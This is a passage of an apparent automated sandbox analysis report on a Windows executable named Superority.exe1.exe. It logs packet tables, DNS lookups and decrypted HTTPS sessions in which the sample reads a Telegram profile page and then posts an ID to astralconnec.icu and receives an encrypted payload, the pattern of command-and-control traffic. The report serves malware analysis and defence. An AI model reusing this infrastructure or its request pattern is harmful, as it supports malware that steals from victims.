Mar 10, 2025 15:31:11.165858030 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.165884018 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.165910959 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.165946007 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.181564093 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.236654997 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.236687899 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.279313087 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.279443979 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.352602005 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.352639914 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.352654934 CET	49688	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.352663040 CET	443	49688	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.623591900 CET	49690	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.623635054 CET	443	49690	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:11.623711109 CET	49690	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.625152111 CET	49690	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:11.625161886 CET	443	49690	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:14.197499990 CET	443	49690	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:14.197756052 CET	49690	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:14.199357033 CET	49690	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:14.199368954 CET	443	49690	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:14.199621916 CET	443	49690	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:14.200997114 CET	49690	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:14.201137066 CET	49690	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:14.201155901 CET	443	49690	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:35.051729918 CET	443	49690	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:35.051839113 CET	443	49690	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:35.051918030 CET	49690	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:35.052126884 CET	49690	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:35.052140951 CET	443	49690	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:35.082737923 CET	49696	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:35.082866907 CET	443	49696	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:35.082971096 CET	49696	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:35.083329916 CET	49696	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:35.083379030 CET	443	49696	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:37.361934900 CET	443	49696	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:37.362042904 CET	49696	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:37.363403082 CET	49696	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:37.363409996 CET	443	49696	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:37.363662004 CET	443	49696	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:37.364897013 CET	49696	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:37.365029097 CET	49696	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:37.365061045 CET	443	49696	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:37.365113020 CET	49696	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:37.412322998 CET	443	49696	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:38.299590111 CET	443	49696	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:38.299709082 CET	443	49696	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:38.299789906 CET	49696	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:38.299926043 CET	49696	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:38.299952984 CET	443	49696	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:38.484838963 CET	49697	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:38.484899044 CET	443	49697	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:38.485049009 CET	49697	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:38.485615015 CET	49697	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:38.485626936 CET	443	49697	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:40.516189098 CET	443	49697	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:40.516357899 CET	49697	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:40.517762899 CET	49697	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:40.517770052 CET	443	49697	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:40.518014908 CET	443	49697	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:40.519279957 CET	49697	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:40.519431114 CET	49697	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:40.519450903 CET	443	49697	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:40.519506931 CET	49697	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:40.519517899 CET	443	49697	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:41.692526102 CET	443	49697	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:41.721098900 CET	443	49697	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:41.721226931 CET	49697	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:41.736434937 CET	49697	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:41.736457109 CET	443	49697	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:42.154195070 CET	49699	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:42.154252052 CET	443	49699	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:42.154342890 CET	49699	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:42.154707909 CET	49699	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:42.154722929 CET	443	49699	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:44.093929052 CET	443	49699	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:44.094027042 CET	49699	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:44.096170902 CET	49699	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:44.096189022 CET	443	49699	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:44.096506119 CET	443	49699	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:44.098118067 CET	49699	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:44.098216057 CET	49699	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:44.098269939 CET	443	49699	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:45.115977049 CET	443	49699	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:45.116113901 CET	443	49699	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:45.116170883 CET	49699	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:45.116274118 CET	49699	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:45.116295099 CET	443	49699	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:45.434415102 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:45.434525013 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:45.434645891 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:45.435018063 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:45.435055017 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.557637930 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.557754993 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.559119940 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.559140921 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.559407949 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.560729027 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.561548948 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.561594963 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.561741114 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.561784983 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.561959028 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.561996937 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.562182903 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.562227964 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.562441111 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.562479973 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.562707901 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.562745094 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.562777996 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.562803984 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.562917948 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.562953949 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.562994957 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.563021898 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.563097000 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.563163042 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.563215017 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.563251019 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.563349962 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.563410044 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:31:47.563415051 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:31:47.563441038 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:09.562134027 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:09.562236071 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:09.562321901 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:09.562508106 CET	49700	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:09.562527895 CET	443	49700	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:09.567795992 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:09.567857027 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:09.567940950 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:09.568284035 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:09.568295002 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:11.432534933 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:11.432610989 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:11.434552908 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:11.434575081 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:11.434887886 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:11.436300993 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:11.436336994 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:11.436431885 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.345854998 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.345904112 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.345928907 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.345953941 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.346023083 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:12.346031904 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.346105099 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:12.346858978 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.346919060 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:12.346987009 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.348104954 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.348140001 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.348186016 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:12.348191977 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.348225117 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.348248959 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:12.348284960 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:12.348506927 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:12.348521948 CET	443	49701	104.21.77.86	192.168.2.7
Mar 10, 2025 15:32:12.348536015 CET	49701	443	192.168.2.7	104.21.77.86
Mar 10, 2025 15:32:12.348541975 CET	443	49701	104.21.77.86	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 10, 2025 15:31:05.372323036 CET	63054	53	192.168.2.7	1.1.1.1
Mar 10, 2025 15:31:05.384941101 CET	53	63054	1.1.1.1	192.168.2.7
Mar 10, 2025 15:31:08.510880947 CET	55446	53	192.168.2.7	1.1.1.1
Mar 10, 2025 15:31:08.526149035 CET	53	55446	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 10, 2025 15:31:05.372323036 CET	192.168.2.7	1.1.1.1	0xc7b	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:31:08.510880947 CET	192.168.2.7	1.1.1.1	0xdd0e	Standard query (0)	astralconnec.icu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 10, 2025 15:31:05.384941101 CET	1.1.1.1	192.168.2.7	0xc7b	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:31:08.526149035 CET	1.1.1.1	192.168.2.7	0xdd0e	No error (0)	astralconnec.icu	104.21.77.86	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:31:08.526149035 CET	1.1.1.1	192.168.2.7	0xdd0e	No error (0)	astralconnec.icu	172.67.205.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

astralconnec.icu

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49686	149.154.167.99	443	5988	C:\Users\user\Desktop\Superority.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:31:07 UTC	61	OUT	GET /asdawfq HTTP/1.1 Connection: Keep-Alive Host: t.me
2025-03-10 14:31:08 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 10 Mar 2025 14:31:08 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12333 Connection: close Set-Cookie: stel_ssid=9294a83f12e84b3fdd_3612112647816244723; expires=Tue, 11 Mar 2025 14:31:08 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2025-03-10 14:31:08 UTC	12333	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 64 61 77 66 71 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asdawfq</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49688	104.21.77.86	443	5988	C:\Users\user\Desktop\Superority.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:31:10 UTC	267	OUT	POST /DPowko HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 65 Host: astralconnec.icu
2025-03-10 14:31:10 UTC	65	OUT	Data Raw: 75 69 64 3d 65 36 39 33 39 34 63 33 31 31 37 65 36 62 34 31 30 36 62 63 35 37 33 31 32 34 62 65 62 31 34 31 32 35 63 61 39 66 66 62 33 34 36 62 30 33 61 63 66 38 37 35 31 63 38 63 26 63 69 64 3d Data Ascii: uid=e69394c3117e6b4106bc573124beb14125ca9ffb346b03acf8751c8c&cid=
2025-03-10 14:31:11 UTC	789	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 14:31:10 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVcfgiz7suNHGw9HE%2BRgTqi2%2BAYnc1x%2FXSpcEvG0IpjMM93Vly2MMKMLechtONgE97KlbfyboxCV65Py%2BKDL2prMOULbGM%2FDXZdpCvee%2BHvSKY899M6Lo2TEf8BHhwZw%2F80j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e383a33cc83beb-MEM alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=27972&min_rtt=26789&rtt_var=9586&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=968&delivery_rate=90946&cwnd=251&unsent_bytes=0&cid=bb66814e5d4750cc&ts=836&x=0"
2025-03-10 14:31:11 UTC	1369	IN	Data Raw: 13 7e 14 6e d7 a6 08 bc 1c f9 5e 3f f6 7a bb 12 6a 18 1d 99 e6 20 8e 2e 62 40 fb 37 f7 e5 ea a7 f2 bd 40 f5 c0 3f 8a 45 fb 39 c1 9e b1 ba 5b de 39 d5 ed 42 58 c7 bd 82 99 a2 32 55 dd 0e 16 a9 78 ab 0e cf e3 22 84 b1 3c 44 6c 11 4c a0 15 00 ed d1 58 64 77 96 dc ed dd 7c 54 e1 52 ce 90 ab 56 43 30 5a d1 44 78 e6 91 6d 25 62 b3 03 b5 5c 0e 74 29 29 55 95 ce cf 33 64 c0 53 14 a1 4f 16 e8 0a fd e8 09 40 ad ca 6c 74 5a dd cf 06 17 ce 1d 4b 6b d2 78 6e 36 8e a2 38 f7 83 6e 95 4e 00 86 a9 1d e2 95 03 54 0e 8b 26 68 61 09 6a 1e a9 a1 f4 ba 7d 50 7f ac 8f 91 cd b3 77 ac 3b eb 89 1d 91 83 39 c5 10 76 2b ce 7d 02 3d b0 2f 62 42 0d b6 e4 fe 26 67 7f a1 c5 b9 98 2c e4 af 79 b8 fd 67 12 85 89 38 8e b5 85 c6 f0 69 2d d5 48 af cf 5e 5b 29 1c fb 57 36 71 b2 ce 63 27 8a 0b Data Ascii: ~n^?zj .b@7@?E9[9BX2Ux"<DlLXdw\|TRVC0ZDxm%b\t))U3dSO@ltZKkxn68nNT&haj}Pw;9v+}=/bB&g,yg8i-H^[)W6qc'
2025-03-10 14:31:11 UTC	1369	IN	Data Raw: 96 c5 3e 2f 72 2f bb 0f 93 eb 77 eb ac 80 39 a3 15 63 f6 50 13 fa 54 95 33 2c d3 b6 ba 7a 0f b0 11 43 23 98 62 cf 40 0e 47 83 86 76 7c 44 38 28 be 03 47 5c 9d 97 64 95 fb b8 f4 fe 0a 8e e0 c3 8d 40 eb 17 08 87 6f 38 00 5a 8f 15 82 26 e6 b5 10 0e cd 2c 39 68 d7 94 bd 0d ec 77 05 12 72 2c 9a 01 ec c1 01 df 81 cf 48 e7 6d 61 d6 9c cb 12 fb f6 02 ed fb b1 a1 d0 a8 d1 14 67 96 be 4a 41 fd 22 32 9a cd b1 d2 88 bd 9b 25 88 5d c2 d6 33 0a 93 eb 9b 6f 7a 92 1e 67 59 e0 cc 78 75 e1 3a ae b0 74 bf 02 96 36 d7 a6 c4 f4 70 fb 00 a1 21 f2 8c 90 60 8d 95 e1 a4 04 14 7b b4 31 23 53 fa fd b4 ed 42 5c 91 e4 77 df 96 4a be 02 85 27 ba 4b f3 e0 a0 05 3d ef 52 b2 dd 9e 42 d1 52 2a 6a 19 0f cd a2 fa 39 b8 1e 19 83 67 e3 e0 43 9f 4c e6 f1 fe 36 1a 20 e9 f2 40 f5 85 2a 8f 71 e5 Data Ascii: >/r/w9cPT3,zC#b@Gv\|D8(G\d@o8Z&,9hwr,HmagJA"2%]3ozgYxu:t6p!`{1#SB\wJ'K=RBRj9gCL6 @q
2025-03-10 14:31:11 UTC	1369	IN	Data Raw: 7c 3d 16 b8 f9 6d 21 04 ae 2a d0 98 cc a6 70 1d 2e 40 0d 38 e2 33 b0 6f ee e9 a6 eb 79 75 42 7c 7a ec dc ea 6d 25 0a cc c9 87 52 ed c2 1b 6a 09 85 de 2e dd 37 fd b9 f7 65 14 48 9f 76 a6 fb d1 4c 8e 37 00 7f 9f ff 8f c0 7d 7e fc 86 bf 3a 58 c2 50 a5 4d b7 82 ab 95 14 6a 48 dd 92 dd fa 34 86 46 eb cf b1 3e b5 d9 6e c7 d8 ba 3e c3 49 55 dc 16 60 00 de 86 de 9e b0 ee 76 d0 4b 63 de f8 e7 f2 dd 3c b1 64 42 c6 72 2a 4a 67 69 3c 34 22 a5 bd d6 97 5e c4 3a 21 03 80 b4 fd 42 88 b4 4a bf fd 2b bf ed 6f de 9d d7 20 81 05 c7 db 53 50 54 11 aa 0c ad 0b 00 68 08 69 76 dc 90 44 25 03 c6 a6 12 1d ff f5 2d 7d e6 7b e9 59 6b 31 e1 c3 56 67 7d 38 24 c0 40 41 b2 0c 76 0a 55 a8 79 77 8e fb 5b 4c b8 4a ea 1f 1a 04 32 cb 50 94 79 2e 36 89 ae 4f e5 77 da 2d 57 a8 fc 71 c4 39 9d Data Ascii: \|=m!p.@83oyuB\|zm%Rj.7eHvL7}~:XPMjH4F>n>IU`vKc<dBrJgi<4"^:!BJ+o SPThivD%-}{Yk1Vg}8$@AvUyw[LJ2Py.6Ow-Wq9
2025-03-10 14:31:11 UTC	1369	IN	Data Raw: 80 e5 50 1d ce 6f 1b f0 5d ed d4 74 a7 c4 73 67 9a 34 cc 70 78 3f a4 14 7f cc 60 a0 30 2f a4 4a cb 04 ec ec b8 2e e0 46 84 63 9b a0 8b 8f b1 1a 00 eb 7b c4 70 60 6f 64 49 fb 99 c3 6c b9 08 ca dd ee 37 de e2 5f 15 b4 cb c8 1c d2 54 9e 40 25 d4 cc fd 3d a7 94 d0 96 e4 34 ca d9 4f 3d 0c ea 68 6e 6d 86 a5 5a 06 b9 e6 42 09 97 c1 93 55 33 4b 46 8f df 3a 31 b3 18 1f 68 7f 2a 4b a7 61 fb 80 83 d7 e3 4a 2a a0 4f 76 63 0f 94 db 67 32 a7 08 63 4a cf 6f 67 06 b4 1b 80 c1 22 a7 f8 20 02 5b 30 b6 75 0a 4c cf d4 84 51 1b f6 af 90 c9 e6 6b d6 77 19 c3 fe bb b1 a7 7d 45 cf bd 66 9e 0f 34 95 db e3 2f 89 83 88 89 92 9d bf 99 7b 7a 7f d3 4a 2f 7f 5d bc 90 d1 8f 2c b5 87 a0 a2 fa 25 4f b1 c6 10 5b 86 48 7e b8 2a 4a 87 b9 0d 8c d8 26 a7 ed 37 7c 7f c7 bc e2 60 74 a2 4e 6d 07 Data Ascii: Po]tsg4px?`0/J.Fc{p`odIl7_T@%=4O=hnmZBU3KF:1hKaJOvcg2cJog" [0uLQkw}Ef4/{zJ/],%O[H~*J&7\|`tNm
2025-03-10 14:31:11 UTC	1369	IN	Data Raw: e7 2b 41 53 84 f4 94 1a b5 bf 2d 62 0a e1 78 6b fd 2a 11 a4 f5 da cf e2 95 d7 cb aa 33 e4 d8 ca 03 43 ae 35 93 64 7e c0 84 f0 cb dd 38 86 ce 4a d8 94 f9 66 ac 39 f6 f0 58 f8 c6 d6 fb 30 b6 35 eb 92 2a 2e c6 f8 ce 7d 48 86 48 1b f0 d0 ae 84 c5 08 03 f7 1c 17 00 3e e5 01 5f c3 39 84 d7 24 75 dc 5f fc 0d 97 0b 41 0d ec 58 fa df 0b 63 d4 98 35 82 81 f8 33 1a 79 0f b1 5b bb 75 6b 85 1d a3 16 06 b5 cb 05 59 7f d4 22 8b 51 9e 2f ac e4 4d 07 74 bd 37 f2 42 57 f9 b0 dd a8 e5 e7 49 3c e6 7a b8 07 56 88 6c 3e 3d 37 2d 4c 17 a9 44 d0 cb 40 10 68 5f fa 50 45 6d a4 10 d0 89 15 ee 53 94 47 d4 77 09 ba a5 13 3d 00 5c d7 b6 4d 04 29 16 90 75 f8 b7 c1 b8 3d b8 40 77 64 2d d8 90 ba 3e 65 37 f4 3f 40 90 4d 5d c8 72 c2 65 49 cc 79 d2 9d 1c 45 bb 5e 11 5b 17 b1 8e 22 50 69 a3 Data Ascii: +AS-bxk3C5d~8Jf9X05.}HH>_9$u_AXc53y[ukY"Q/Mt7BWI<zVl>=7-LD@h_PEmSGw=\M)u=@wd->e7?@M]reIyE^["Pi
2025-03-10 14:31:11 UTC	1369	IN	Data Raw: f2 c5 26 b7 5c ce 0d 7f 81 a7 a8 74 2a 88 6d 9d 4f 17 4e a3 a3 15 6f d0 c8 d7 06 ba 9e 90 de 4e 0a 49 d4 ba a2 40 aa 4f a5 5e 84 18 10 36 fb 10 e9 94 c8 b0 25 6a b3 1e ee b2 40 7c a5 07 ea 13 a6 46 0c a2 ef 02 c7 08 07 b9 e9 bc d0 80 35 56 9f c4 8f 79 90 be ad 3a 0b 05 91 72 13 83 19 d4 26 30 fd ce 64 90 fb 6e 9d da 11 6d ad 15 15 4a f4 47 e2 23 65 ef 43 57 46 40 16 38 19 af ab d9 cb 6b 19 90 6d e9 87 66 f4 af 30 f6 59 0d c0 69 64 e1 ee b6 21 5e 7e 30 ef ab 6c 30 52 f8 b3 b2 fd 04 ce f0 6d ca a9 3b ef 1e b4 02 f9 d0 43 65 15 1b 8a c0 eb e0 17 6a 29 95 17 1c f0 ca 7f b3 d1 ef fe 3b c0 26 e2 a4 8f 50 79 bc b5 49 e9 a3 7e 8c b5 84 b0 55 73 7f 68 8a bc 9a cb 9b 80 f9 84 77 48 fa 1e 3d f1 b6 7b 35 1d 3c e5 cd ea 8c 82 ed 1a fd 43 c1 6a 76 d3 42 4d d8 ca 5f fc Data Ascii: &\t*mONoNI@O^6%j@\|F5Vy:r&0dnmJG#eCWF@8kmf0Yid!^~0l0Rm;Cej);&PyI~UshwH={5<CjvBM_
